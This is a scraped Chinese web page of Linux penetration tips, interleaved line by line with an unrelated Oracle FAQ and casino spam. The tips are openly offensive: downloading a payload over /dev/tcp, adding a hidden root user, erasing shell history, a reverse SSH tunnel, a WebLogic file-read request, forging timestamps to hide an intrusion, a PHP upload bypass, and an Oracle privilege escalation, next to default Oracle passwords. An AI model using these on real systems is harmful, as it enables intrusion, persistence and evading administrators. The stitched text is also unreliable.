当前位置:金沙js333娱乐场 > 网络频道 > 送给Linux渗透爱好者的小技巧

送给Linux渗透爱好者的小技巧

文章作者:网络频道 上传时间:2019-10-17

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0n" >&5 && cat<&5 > c.pl

  1. Oracle安装完成后的初始口令?

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

 internal/oracle

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null

  sys/change_on_install

4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost   -p 44即可

  system/manager

5.weblogic本地读取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

  scott/tiger

6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS

  sysman/oem_temp

7.cvs渗透技巧
CVSROOT/passwd   UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root  
CVS/Entries     更新的文件和目录内容
CVS/Repository

 

8.Cpanel路径泄露
/3rdparty/squirrelmail/functions/plugin.php

  1. ORACLE9IAS WEB CACHE的初始默认用户和密码?

9.修改上传文件时间戳(掩盖入侵痕迹)
touch -r 老文件时间戳 新文件时间戳

administrator/administrator

10.利用baidu和google搜索目标主机webshell
intitle:PHPJackal 1t1t

 

11.包总补充
创建临时“隐藏”目录 mkdir /tmp/...
/tmp/...目录在管理员有宿醉的情况下是“隐藏”的,可以临时放点exp啥的

  1. oracle 8.0.5怎么创建数据库?

12.利用linux输出绕过gif限制的图片
printf "GIF89ax01x00x01x00<?php phpinfo();?>" > poc.php

用orainst。如果有motif界面,可以用orainst /m

13.读取环境变量对于查找信息非常有帮助
金沙js333娱乐场,/proc/self/environ

 

14.最新的Oracle 11提升用户权限(只要session权限)
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

  1. oracle 8.1.7怎么创建数据库?

判断登陆权限
select * from session_privs;
Create SESSION

dbassist

select * from session_roles;

 

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = 'GREMLIN(用户名)';

  1. oracle 9i 怎么创建数据库?

本文由金沙js333娱乐场发布于网络频道,转载请注明出处:送给Linux渗透爱好者的小技巧

关键词: